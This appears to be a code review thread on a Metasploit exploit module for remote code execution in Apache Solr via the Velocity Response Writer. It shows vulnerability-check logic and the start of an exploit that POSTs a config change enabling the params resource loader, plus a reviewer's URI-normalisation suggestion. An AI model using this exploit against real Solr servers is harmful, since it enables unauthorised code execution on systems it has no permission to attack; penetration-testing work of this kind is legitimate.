modules/exploits/multi/http/solr_velocity_rce.rb

```diff
@@ -0,0 +1,407 @@
+        next
+      end
+
+      # convert to JSON... for the third time
+      core_config_json = core_config.get_json_document
+      # if the core configuration does not include the Velocity Response Writer, go check the next core
+      unless core_config_json['config']['queryResponseWriter'].keys.include?("velocity")
+        print_error("Velocity Response Writer not found in core #{core_name}")
+        next
+      else
+        print_good("Found Velocity Response Writer in use by core #{core_name}")
+        @possibly_vulnerable_cores.push(core_name)
+      end
+
+      # if params.resource.loader.enabled is false, we need to set it to true before exploitation
+      if core_config_json['config']['queryResponseWriter']['velocity']['params.resource.loader.enabled'] == "true"
+        print_good("params.resource.loader.enabled for core '#{core_name}' is set to true.")
+        @params_resource_loader_enabled = true
+      else
+        print_warning("params.resource.loader.enabled for core #{core_name} is set to false.")
+      end
+
+      # if we exploiting, the first core that fits the criteria is selected.
+      # whether or not the core has params.resource.loader.enabled is not a factor as
+      # we can attempt to modify it during the exploit
+      if @vuln_check == false
+        unless @possibly_vulnerable_cores == nil
+          @core_name = @possibly_vulnerable_cores[0]
+          return CheckCode::Vulnerable
+        else
+          return CheckCode::Safe
+        end
+      end
+    end
+
+    # for checking, look at the array of vulnerable cores
+    if @possibly_vulnerable_cores == nil
+      return CheckCode::Safe "No cores are vulnerable!"
+    else
+      return CheckCode::Vulnerable
+    end
+  end
+
+  # the exploit method
+  def exploit
+    # we are prepping to check and exploit, not prepping to check only
+    @vuln_check = false
+    unless [CheckCode::Vulnerable].include? check
+      fail_with Failure::NotVulnerable, "Target is most likely not vulnerable!"
+    end
+
+    # the new config in JSON format
+    @enable_params_resource_loader = {
+      "update-queryresponsewriter": {
+        "startup": "lazy",
+        "name": "velocity",
+        "class": "solr.VelocityResponseWriter",
+        "template.base.dir": "",
+        "solr.resource.loader.enabled": "true",
+        "params.resource.loader.enabled": "true"
+      }
+    }.to_json
+
+    # if params.resource.loader.enabled is not true
+    if @params_resource_loader_enabled != true
+      print_status("params.resource.loader.enabled is not true, setting it to true...")
+      update_config = send_request_cgi({
+                      'method'        => 'POST',
+                      'headers'       => @headers,
+                      'ctype'         => 'application/json;charset=utf-8',
+                      'encode_params' => false,
+                      'uri'           => "/solr/#{@core_name}/config",
```

Comment:
```suggestion
                      'uri'           => normalize_uri(target_uri.path, @core_name.to_s, 'config')
```

Reply:
Fixed in commit daae0886fa2080113de149c45eceb478c6b9ad29